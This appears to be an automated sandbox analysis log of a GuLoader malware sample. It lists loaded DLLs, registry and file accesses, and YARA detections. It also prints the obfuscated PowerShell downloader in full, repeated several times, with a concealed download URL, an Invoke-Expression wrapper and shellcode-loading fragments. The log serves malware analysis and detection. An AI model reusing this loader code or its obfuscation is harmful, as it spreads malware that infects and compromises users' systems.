Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: iertutil.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.878914102008.0000000007121000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdb; source: powershell.exe, 0000000D.00000002.878917749751.0000000008791000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr
Source:	Binary string: wab.pdb source: GrOcCQC.exe, GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000000D.00000002.878919425134.0000000008CCF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.878918969194.0000000008A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Discophile)$global:Refracting = [System.Text.Encoding]::ASCII.GetString($Joviality)$global:Effected=$Refracting.substring($Pushmina119,$Faseforvrngning)<#sundayproof costlew Semidito
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unmortised252 $Forgodtbefindendets $Bilaan), (Sandsynliggrer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Nonvillager = [AppDomain]::CurrentDomain.GetAs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($kantning)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Bifurcations, $false).DefineType($realeksaminen,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Discophile)$global:Refracting = [System.Text.Encoding]::ASCII.GetString($Joviality)$global:Effected=$Refracting.substring($Pushmina119,$Faseforvrngning)<#sundayproof costlew Semidito

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ 